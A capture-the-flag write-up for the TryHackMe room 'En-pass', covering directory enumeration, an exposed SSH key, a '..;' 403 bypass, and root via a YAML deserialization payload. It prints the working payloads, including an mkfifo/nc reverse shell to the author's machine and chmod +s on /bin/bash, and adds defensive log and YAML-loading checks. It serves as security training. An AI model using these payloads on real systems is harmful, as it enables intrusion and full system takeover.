Description: Get what you can't.

Tags: security, linux

Difficulty: Medium

Host: TryHackMe | En-pass (by kiransau) - https://tryhackme.com/room/enpass


Rustscan

I started by scanning the machine with Rustscan.

 rustscan -a 'machine-ip' -- -sC -sV 
Rustscan result

GoBuster

With the webserver on port 8001 I started a GoBuster scan in the background to find any hidden directories adding some extensions to it.

 gobuster dir -u http://'machine-ip':8001/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,sh,cgi,html,zip,bak,sql,old 
GoBuster scan result

Website

But first I went to port 8001 to view the main page. I saw three different pictures, and at the bottom of two of them were some cryptic strings.

Index page

With ROT 23 I got the output "Best of Luck!!" and the second string decoded with Base64 contained the word "sadman".

The "403.php" page said "forbidden" and I'll inspect it later on.

403 page

And the "reg.php" page got me to an input field.

reg page

Then I quickly looked at the "/zip" directory and there was a ton of directories.

zip directory

I downloaded the first one, but the extracted content once again had the word "sadman" in it. A rabbit hole.

ZIP dir content

SSH key

Now the "/web" directory returned the status code 301, but that didn't stop me from trying to search through it with GoBuster.

 gobuster dir -u http://'machine-ip':8001/web/ -w /usr/share/dirb/wordlists/common.txt 

With this I found the directory "/resources" but again with the status code 301.

resources

I started another scan but I couldn't find anything. Therefore I had to step it up a bit and used a bigger wordlist.

 gobuster dir -u http://'machine-ip':8001/web/resources/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt 

Here I got the directory "/infoseek".

infoseek

I ran another scan

 gobuster dir -u http://'machine-ip':8001/web/resources/infoseek -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt 

and found the directory "/configure".

Configure dir

And with the next scan I finally got to the end of it.

 gobuster dir -u http://'machine-ip':8001/web/resources/infoseek/configure -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt 
SSH key

I saved the key, set up the permission with

 chmod 600 key 

but I still had to find a username.

PHP code

Next I went to the "reg.php" page again and looked at the source code.

reg source code

I am not an expert in reading PHP code, but I worked through it one by one. So first, the code picks the input and uses the "explode()" function to split it into single items with the comma as a separator.

PHP explode

I started with the very basic stuff. First, an array with 9 objects starting from index 0. I knew this because the "val[8]" part is looking at index number 8 and the for-loop cycles through the whole code below 9 times ($i < 9).

Array

Then I considered the string lengths of the objects from the first comparison. At index 0 it had to be 2 and at index 8 it had to be a length of 3.

String lengths

To fulfill the next comparison, that some values have to be different, I simply entered a random value for each object. Another interesting thing is that all the values are from the number row at the top of my keyboard. Maybe that had something to do with it. But nonetheless I got a possible input with it, all separated with a comma.

Values filled
 §§,!,",(,),%,=,&,??? 

When I entered this array, I got a password. It was probably for the SSH key I found earlier. So there's only a username missing.

403 page

Another page I wanted to inspect further was "403.php". For this I stumbled across a lot of different resources about bypassing a 403 page. I looked into tools from lobuhi, iamj0ker and DirDar. With this I collected a huge list of possibilities and edited the scripts with the other payloads I found.

Running payload

As you can see, the only different hit was with

 [...]/403.php/..;/ 

With this payload I got the username.

Username
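From the defender's side, the same path-confusion sequence is easy to spot in web server access logs. This is an added example (not from the post or the room) run over constructed log lines; the combined-style log format and the flagged segment shapes are my assumptions:

```python
import re

# Constructed sample in Apache/nginx combined-style format (not real room traffic).
# Line 2 carries the "/..;/" sequence the post used to get past 403.php.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /403.php HTTP/1.1" 403 162 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /403.php/..;/ HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /reg.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def dot_dot_segments(path):
    """Return the path segments that become '..' once a lenient back end strips
    ';...' path parameters (e.g. '..;' or '..;jsessionid=x'), which is why the
    access rule matching the literal path never fires. A plain '..' is returned
    as well so ordinary traversal attempts are caught by the same check."""
    segments = path.split("?", 1)[0].split("/")
    return [s for s in segments if s.split(";", 1)[0] == ".."]

def find_path_confusion(log_text):
    """Return (ip, path, status, segments) for every request whose path carries
    such a segment. A 2xx status on a path that should be blocked is the case
    to escalate; a 403 or 404 is still a probe worth correlating by source IP."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format instead of crashing the scan
        segs = dot_dot_segments(m.group("path"))
        if segs:
            findings.append((m.group("ip"), m.group("path"), int(m.group("status")), segs))
    return findings
```

Run against SAMPLE_LOG this flags only the second line, served with status 200; the fix on the server side is to apply the access rule after path normalisation, not to the raw request string.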

SSH access

Now that I collected every part, I logged in with the username, keyfile and the password.

 ssh -i key imsau@'machine-ip' 

Here I got the first flag (*1).

Privilege escalation

I changed my shell with Python3.

 python3 -c 'import pty; pty.spawn("/bin/bash")' 

I listed the root directory structure with

 cd /; ls -la * 

and found something in "/opt/scripts". The "file.py" in there was a Python script importing yaml. And on execution, it loads the file "/tmp/file.yml".

file script location

Because I couldn't find a cronjob running, I loaded "pspy" onto the victim machine, and after a short amount of time this whole code block got executed.

pspy64

I had to search for quite a while, but then I got to this post about hacking Python apps from Vickie Li. With this I wanted to insert a reverse shell first, but I couldn't get it to work with a Bash or Python shell. So I tried something different and forced the script to display the root flag with the wall command. Here I hoped that it was at the usual location.

 echo '!!python/object/apply:os.system ["wall /root/root.txt"]' > /tmp/file.yml 
wall flag

Here I actually got the flag (*2)!
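What makes this work is that the scheduled script parses an attacker-writable file with a YAML loader that honours the "!!python/" tags, so the tag resolves to os.system. As an added defensive illustration (not code from the room or the post), the same document is rejected when the loader refuses those tags; the sample documents are constructed, and PyYAML is assumed to be installed only for the optional final parse:

```python
import re

# Constructed sample: the same shape of document the post wrote to /tmp/file.yml
# (not copied from the room), beside a benign file such a script might legitimately read.
MALICIOUS_DOC = '!!python/object/apply:os.system ["wall /root/root.txt"]\n'
BENIGN_DOC = "schedule: daily\nretries: 3\n"

# PyYAML's full Loader resolves these tags to arbitrary Python callables;
# yaml.safe_load does not know them at all and raises instead of running anything.
PYTHON_TAG = re.compile(r"!!python/(?:object|name|module|apply)\b")

def find_python_tags(yaml_text):
    """Return (line_number, tag) for every python-specific tag in the text."""
    hits = []
    for lineno, line in enumerate(yaml_text.splitlines(), 1):
        hits.extend((lineno, m.group(0)) for m in PYTHON_TAG.finditer(line))
    return hits

def load_config(yaml_text):
    """Refuse python tags up front, then parse with the safe loader only.

    Returns the parsed document, or None when PyYAML (third-party) is not
    installed; the pre-check itself needs nothing beyond the standard library."""
    hits = find_python_tags(yaml_text)
    if hits:
        raise ValueError(f"refusing to load YAML with python tags: {hits}")
    try:
        import yaml
    except ImportError:
        return None
    return yaml.safe_load(yaml_text)

def is_rejected(yaml_text):
    """True when load_config refuses the document."""
    try:
        load_config(yaml_text)
    except ValueError:
        return True
    return False
```

The tag scan is only a belt-and-braces log signal; the actual fix is yaml.safe_load plus reading the file from a location only root can write, instead of /tmp.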

Playing around some more

I got the last flag, but the fact that I wasn't able to spawn a shell bugged me. Also, the name and location of the root flag were more like a shot in the dark. So I played around some more, and then I tried the next shell I had in my list and got a hit.

 echo '!!python/object/apply:os.system ["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 'my-own-ip' 4444 >/tmp/f"]' > /tmp/file.yml 
Reverse shell

For the next time I have to keep in mind to try really every possible reverse shell I got. Another possibility would be setting the SUID bit for the "/bin/bash" binary.

 echo '!!python/object/apply:os.system ["chmod +s /bin/bash"]' > /tmp/file.yml 
SUID bash

Task overview

1. Name The Path.

  • /web/resources/infoseek/configure/key

2. What is the user flag?

  • [...]

3. What is the root flag?

  • [...]
